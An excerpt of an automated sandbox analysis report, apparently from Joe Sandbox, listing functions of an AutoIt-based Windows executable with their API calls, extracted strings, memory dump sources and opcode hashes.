                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                  • Opcode ID: 0901b6529b79d613af2b79753888248cd1da88f1a49ee40883652e195ac6eee1
                                                                                                                                  • Instruction ID: b77a857b860a69ee965fb829e50dc3a7709fd88f55a30a12015c4238e1dfac0c
                                                                                                                                  • Opcode Fuzzy Hash: 0901b6529b79d613af2b79753888248cd1da88f1a49ee40883652e195ac6eee1
                                                                                                                                  • Instruction Fuzzy Hash: 25512BB5900309EFDB25CFA8DC85EAEBBB9EF48710F14842DFA59A7250D731A9418B50
                                                                                                                                  Function 00EED520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 00EED567
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EED589
                                                                                                                                  • __swprintf.LIBCMT ref: 00EED5DC
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED68D
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED6AB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  • API String ID: 2116804098-2391861430
                                                                                                                                  • Opcode ID: 2f35ccd5d9705a29a082a125d527c12ae4080fd4d73f1a62027d7a6198f28deb
                                                                                                                                  • Instruction ID: 71f9d3a3c20d5376857d8de7639a65b48ab4b42b1fa632b5054511be976f0541
                                                                                                                                  • Opcode Fuzzy Hash: 2f35ccd5d9705a29a082a125d527c12ae4080fd4d73f1a62027d7a6198f28deb
                                                                                                                                  • Instruction Fuzzy Hash: 0A51B47280424DBACF15EBA0DD42EEEB7B9AF09300F105066F515B60A1EB726F58DB61
                                                                                                                                  Function 00EED338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00EED37F
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EED3A0
                                                                                                                                  • __swprintf.LIBCMT ref: 00EED3F3
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED499
                                                                                                                                  • _wprintf.LIBCMT ref: 00EED4B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  • API String ID: 2116804098-3420473620
                                                                                                                                  • Opcode ID: 745b570fe9c798670799ac705152f5e1670d43ef8b3813929626555608643fdf
                                                                                                                                  • Instruction ID: 9b3f0c0fa5ad0b7a24147e75402dace91db1a5a0541491e9e99f0d2508d10239
                                                                                                                                  • Opcode Fuzzy Hash: 745b570fe9c798670799ac705152f5e1670d43ef8b3813929626555608643fdf
                                                                                                                                  • Instruction Fuzzy Hash: 8851C37280024DBACF15EBE0DD46EEEB7B9AF19700F109066F115B20A1EB716F58DB61
                                                                                                                                  Function 00EDAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • _memset.LIBCMT ref: 00EDAF74
                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EDAFA9
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EDAFC5
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00EDAFE1
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00EDB00B
                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00EDB033
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EDB03E
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00EDB043
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                  • API String ID: 1411258926-22481851
                                                                                                                                  • Opcode ID: 7b2539ca1d2fdf39a41001c57816e6cea9219f68b543650aef413b9ad5bad45d
                                                                                                                                  • Instruction ID: cb815cc992935d6696236807c3498d36350408fa51b7a8c4bcedb91bc4fee843
                                                                                                                                  • Opcode Fuzzy Hash: 7b2539ca1d2fdf39a41001c57816e6cea9219f68b543650aef413b9ad5bad45d
                                                                                                                                  • Instruction Fuzzy Hash: C2411976C1022DAACF11EBA4DC85DEEB7B8FF19704F04556AE901B6260EB70AE05CB51
                                                                                                                                  Function 00F03AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                  • Opcode ID: b9d43bb6bd88b583fd3b9c0e1aabc48ba67e035fcde3c8c123fe0ebf2708754c
                                                                                                                                  • Instruction ID: db9acfd199aa5e80b650a43467eede1a292309ddb21d505bdd007b3a85bcaddc
                                                                                                                                  • Opcode Fuzzy Hash: b9d43bb6bd88b583fd3b9c0e1aabc48ba67e035fcde3c8c123fe0ebf2708754c
                                                                                                                                  • Instruction Fuzzy Hash: AF4193351002498BEF09EF14DC51BEB33A9BF16354F185824EC51AB296EB30AE5AFB50
                                                                                                                                  Function 00EE83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EE843F
                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EE8455
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EE8466
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EE8478
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EE8489
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                  • Opcode ID: 56fcdf98c2ec829638a3772dc7cd3b5208ed6ba7a653f0f446f35adf39c4bf7a
                                                                                                                                  • Instruction ID: 5cc3e1cb19f5dfde65b5c6a87f798de8e70c4049751cf7cdfe7bbaceb73c229f
                                                                                                                                  • Opcode Fuzzy Hash: 56fcdf98c2ec829638a3772dc7cd3b5208ed6ba7a653f0f446f35adf39c4bf7a
                                                                                                                                  • Instruction Fuzzy Hash: 54112771A4025D39D710A7A6DC4ADFF7BBCEFD6B40F000829B911B60C1DEA09E08C5B1
                                                                                                                                  Function 00EE8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • timeGetTime.WINMM ref: 00EE809C
                                                                                                                                    • Part of subcall function 00EBE3A5: timeGetTime.WINMM(?,75C0B400,00F16163), ref: 00EBE3A9
                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00EE80C8
                                                                                                                                  • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00EE80EC
                                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00EE810E
                                                                                                                                  • SetActiveWindow.USER32 ref: 00EE812D
                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EE813B
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EE815A
                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00EE8165
                                                                                                                                  • IsWindow.USER32 ref: 00EE8171
                                                                                                                                  • EndDialog.USER32(00000000), ref: 00EE8182
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                  • String ID: BUTTON
                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                  • Opcode ID: 053f77438b6adfe4162e17e83ba46ac576675f1065ad21988ab6440134f516d7
                                                                                                                                  • Instruction ID: 2c6368d9b7adbafd6c6d1692646c9facb45c8430a7cb065f842b6bfc7d62c3ce
                                                                                                                                  • Opcode Fuzzy Hash: 053f77438b6adfe4162e17e83ba46ac576675f1065ad21988ab6440134f516d7
                                                                                                                                  • Instruction Fuzzy Hash: 9921937020024DBFF7229B22ED89A267B6AFB5438DF081114F529A2261CFB24D06BA51
                                                                                                                                  Function 00EE32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00F13C64,00000010,00000000,Bad directive syntax error,00F3DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00EE32D1
                                                                                                                                  • LoadStringW.USER32(00000000,?,00F13C64,00000010), ref: 00EE32D8
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • _wprintf.LIBCMT ref: 00EE3309
                                                                                                                                  • __swprintf.LIBCMT ref: 00EE332B
                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EE3395
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                  • API String ID: 1506413516-4153970271
                                                                                                                                  • Opcode ID: 651cd6ebb6e83548347f64e4d6b98462eb3c00650d8fbe15c0707394136a068b
                                                                                                                                  • Instruction ID: 0f2c327feb57a4a32099f91cea26ca660f09d541188f1b988842bacd5245e862
                                                                                                                                  • Opcode Fuzzy Hash: 651cd6ebb6e83548347f64e4d6b98462eb3c00650d8fbe15c0707394136a068b
                                                                                                                                  • Instruction Fuzzy Hash: 98214F3284021EBBDF11AFA0CC0AEEE7775BF19701F005456FA15B50A2DA72AA58EB51
                                                                                                                                  Function 00EEC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EEC6A0: __time64.LIBCMT ref: 00EEC6AA
                                                                                                                                    • Part of subcall function 00EA41A7: _fseek.LIBCMT ref: 00EA41BF
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EEC96F
                                                                                                                                    • Part of subcall function 00EC297D: __wsplitpath_helper.LIBCMT ref: 00EC29BD
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EEC982
                                                                                                                                  • _wcscat.LIBCMT ref: 00EEC995
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00EEC9BA
                                                                                                                                  • _wcscat.LIBCMT ref: 00EEC9D0
                                                                                                                                  • _wcscat.LIBCMT ref: 00EEC9E3
                                                                                                                                    • Part of subcall function 00EEC6E4: _memmove.LIBCMT ref: 00EEC71D
                                                                                                                                    • Part of subcall function 00EEC6E4: _memmove.LIBCMT ref: 00EEC72C
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EEC92A
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF49
                                                                                                                                    • Part of subcall function 00EECE59: _wcscmp.LIBCMT ref: 00EECF5C
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EECB8D
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EECC24
                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00EECC3A
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EECC4B
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00EECC5D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 152968663-0
                                                                                                                                  • Opcode ID: 30919be7581d75311e9a7275539974df3c809c4dd295f050bcb4514389124991
                                                                                                                                  • Instruction ID: 1f26afc10b16e620c6da0e0bd2a88deda6727d0841b6dff799f4dc5de405264e
                                                                                                                                  • Opcode Fuzzy Hash: 30919be7581d75311e9a7275539974df3c809c4dd295f050bcb4514389124991
                                                                                                                                  • Instruction Fuzzy Hash: D6C139B190022DAECF10DFA5CC81EEEB7B9AF99310F1050AAB609F6151D7719A85CF61
                                                                                                                                  Function 00EF08D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3566271842-0
                                                                                                                                  • Opcode ID: 70141c6f451a98977c787f8d4d38f8071c6b2110586870653ad2226c5489a299
                                                                                                                                  • Instruction ID: a4bf14eba10d05c44df62ac263ce3d3061c0df15521ce3c1624a0893a8984a41
                                                                                                                                  • Opcode Fuzzy Hash: 70141c6f451a98977c787f8d4d38f8071c6b2110586870653ad2226c5489a299
                                                                                                                                  • Instruction Fuzzy Hash: 47712D75900219AFDB10DFA4C984AEEB7F8EF49314F149495E919BB252D730EE41CF90
                                                                                                                                  Function 00EE388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00EE3908
                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00EE3973
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00EE3993
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00EE39AA
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00EE39D9
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00EE39EA
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00EE3A16
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00EE3A24
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00EE3A4D
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00EE3A5B
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00EE3A84
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00EE3A92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: bf1da4c8ac417866da6b6eb5190b3ccf39fc8729484bd7d81d8c808ca260e06c
                                                                                                                                  • Instruction ID: f69a05c4f17027ef42a4c3d048c3af96d3286d4d9c02eb506973eb691d2dc2ae
                                                                                                                                  • Opcode Fuzzy Hash: bf1da4c8ac417866da6b6eb5190b3ccf39fc8729484bd7d81d8c808ca260e06c
